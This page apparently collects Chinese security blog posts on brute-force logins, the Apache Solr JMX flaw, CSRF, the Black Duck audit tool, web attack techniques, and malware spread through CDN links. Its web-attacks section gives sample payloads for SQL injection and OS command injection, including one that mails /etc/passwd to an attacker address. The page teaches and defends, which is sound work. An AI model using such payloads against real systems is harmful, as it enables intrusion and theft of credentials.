网络安全

暴力破解

喜你入骨 提交于 2019-11-25 22:53:39
一、形式   暴力破解大致可以分为以下三种: 1、固定账号,通过不同的密码进行暴力破解   这种方式会在对方的服务器日志中留下记录,管理员可以通过查看登陆失败的日志,很容易察觉遭受了攻击。 2、固定密码 ,通过不同的账号进行暴力破解   这种方式较之上一种最大的优点就是一段时间内,对于用户来说,日志中只会有一次登陆失败的记录。一段时间以后,攻击者可以用另一个密码再次进行此活动。 3、通过常用的账号密码进行暴力破解    二、防御措施 1、不管登录成功还是失败返回同样的信息,这样攻击者就无法通过返回信息的长度来判断正确密码。 2、设置用户登录次数。同一用户登陆失败三次以后,锁定用户,一段时间过后解锁或者联系管理员解锁。 3、限制IP。对于同一IP多次尝试登录的用户,封禁此IP。但是这种方式有个缺点就是攻击者其实是可以改变自己的IP地址的。 4、设置验证码。对于登录处需要设置验证码,而且必须是在后端进行验证,因为通过JS进行验证很容易被绕过。 来源: https://www.cnblogs.com/MilesHo/p/11314617.html

Apache Solr JMX服务远程代码执行漏洞复现

假装没事ソ 提交于 2019-11-25 21:42:42
##0x00 漏洞介绍 该漏洞源于默认配置文件solr.in.sh中的ENABLE_REMOTE_JMX_OPTS配置选项存在安全风险。 Apache Solr的8.1.1和8.2.0版本的自带配置文件solr.in.sh中存在ENABLE_REMOTE_JMX_OPTS="true"选项。 如果使用受影响版本中的默认solr.in.sh文件,那么将启用JMX监视并将其暴露在RMI_PORT上(默认值= 18983), 并且无需进行任何身份验证。 如果防火墙中的入站流量打开了此端口,则具有Solr节点网络访问权限的任何人都将能够访问JMX, 并且可以上传恶意代码在Solr服务器上执行。该漏洞不影响Windows系统的用户,仅影响部分版本的Linux用户。 ##0x01 影响版本 Apache Solr8.1.1和8.2.0版本 ##0x02 漏洞危害 如果受害者使用了该默认配置,则会在默认端口18983开放JMX服务,且默认未开启认证。任何可访问此端口的攻击者可利用此漏洞向受影响服务发起攻击,执行任意代码。 ##0x03 准备工作 1) 搭建环境 安装Apache Solr 8.20 wget https://mirrors.tuna.tsinghua.edu.cn/apache/lucene/solr/8.2.0/solr-8.2.0.zip 2) 启动环境 ##0x04

CSRF攻击与防御

浪尽此生 提交于 2019-11-25 21:22:04
文章内容来自: https://blog.csdn.net/xiaoxinshuaiga/article/details/80766369 CSRF概念: CSRF跨站点请求伪造(Cross—Site Request Forgery),跟XSS攻击一样,存在巨大的危害性,你可以这样来理解: 攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟货币转账等。 如下:其中Web A为存在CSRF漏洞的网站,Web B为攻击者构建的恶意网站,User C为Web A网站的合法用户。 CSRF攻击攻击原理及过程如下: 用户C打开浏览器,访问受信任网站A,输入用户名和密码请求登录网站A; 在用户信息通过验证后,网站A产生Cookie信息并返回给浏览器,此时用户登录网站A成功,可以正常发送请求到网站A; 用户未退出网站A之前,在同一浏览器中,打开一个TAB页访问网站B; 网站B接收到用户请求后,返回一些攻击性代码,并发出一个请求要求访问第三方站点A; 浏览器在接收到这些攻击性代码后,根据网站B的请求,在用户不知情的情况下携带Cookie信息,向网站A发出请求。网站A并不知道该请求其实是由B发起的,所以会根据用户C的Cookie信息以C的权限处理该请求

Black duck(黑鸭子软件)开源代码审计管理测试平台

爷,独闯天下 提交于 2019-11-25 20:55:40
Black duck ™ (黑鸭子软件)是一款对源代码进行扫描、审计和管理 的软件测试工具。 软件分别有 protex、Codecenter、Export组成。该工具统计开源代码的数量、质量、以及潜在的安全漏洞风险。 Protex: 开源代码知识产权与合规性检查。 Coedcenter 寻找管理使用有效的开源代码,以及开源代码中存在的安全漏洞问题。 Export 发现源代码中是否含有出口管制的加密算法。 HUB: 支持二进制开源代码扫描,可以精确到开源代码两行的片段级扫描。 Black duck 功能: 1. 知识产权与合规性:开源软件的 License(法律法规)冲突风险,代码的合规性检查。 2.安全漏洞:开源软件已知安全BUG漏洞、隐藏性、攻击利用性漏洞。 3. 开源软件质量: ①开源软件版本,功能、性能、安全性的提升 。 ②开源软件项目更新的 活跃度,软件质量、发展前景。 ③开源社区的漏洞发现,无人维护和解决问题。 4.自主可控, 外部监管: ①国家相关机构,对软件自主知识产权可控要求 。 ②华为对供应商开源软件合规性检查要求。 Black duck 开源软件测试工具: 1.KB 漏洞库 NVD+VulnDB:①NVD美国国家信息安全 漏洞库。 ②VulnDB美国商业公司漏洞库。 2.软件支持扫描格式:片段级、文件级扫描。 产品特点: 1.Black duck是目前世界上最大

针对Web的攻击技术

喜欢而已 提交于 2019-11-25 20:38:56
主动攻击 SQL注入攻击 OS命令注入攻击 会话劫持 被动攻击 XSS攻击 CSRF攻击 HTTP首部注入攻击 会话固定攻击 一、主动攻击 1.SQL注入攻击 什么是SQL? SQL是用来操作关系型数据库管理系统的数据库语言,可进行操作数据或定义数据等。 什么是SQL注入? SQL注入是指针对Web应用使用的数据库,通过运行非法的SQL而产生的攻击。如果在调用SQL语句的方式上存在疏漏,就有可能执行被恶意注入非法SQL语句。 SQL案例: SELECT * FROM bookTb1 WHERE author = '作者'--' and flag = 1 SQL语句中的--之后全部视为注释,即and flag = 1就会被忽略。 2.OS命令注入攻击 什么是OS命令注入攻击? OS命令注入攻击是指通过Web应用,执行非法的操作系统命令达到攻击的目的。 如何攻击? 可以从Web应用中通过Shell来调用操作系统命令。如果调用的Shell时存在疏漏,就可以执行插入的非法OS命令。通过OS注入攻击可执行OS上安装的各种程序。 示例: |/usr /sbin /sendmail ; cat /etc / passwd | mail hack@example.jp 攻击者输入值(; cat /etc / passwd | mail hack@example.jp)中含有分号(;)

***利用公共服务CDN网络散布恶意软件、躲避监测

旧街凉风 提交于 2019-11-25 19:23:46
  近期,有网络安全研究专家表示,发现网络上出现大量主要针对网银的恶意程序,是由***通过脸书和其它公共群组服务 的CDN内容方式进行的。   安全研究人员还表示,***先是将恶意程序上传到脸书的公共服务,然后获得来自脸书分享的文件跳转地址。   ***通过此类方式注入恶意程序,可以很有效的通过各大公司的网址通常浏览器,还可以躲避安全软件的监测,与此同时获取用户的信任,更好的让用户下载恶意程序。   利用PowerShell脚本加载病毒:   其实用户点击链接下载文件只是一个很普通的压缩包,并没有什么安全隐患,但是该文件压缩包内含有脚本文件调用PowerShell 加载。   由于PowerShell是系统本地文件,并不会被安全软件检测到,当用户在点击下载运行脚本时就会下载***病毒。此外,研究人员还观察到***组织APT32 也正使用该操作瞄准越南地区展开网络***活动。   值得一提的是,当当受害者来自其他国家或地区时,该***的链接将会在最后阶段下载一个空的文件,从而中断***。可想而知***此次的安全行为主要是用来窃取巴西用户的银行信息。   安全防范:   在收到不明的邮件或者是链接,不要轻易的去点击,很有可能是存在着***病毒。在国内使用知名公司的跳转地址散步***的***也常见,通常都是使用t.cn、url.cn 以及dwz.cn这三个地址。这三个地址主要是在新浪微博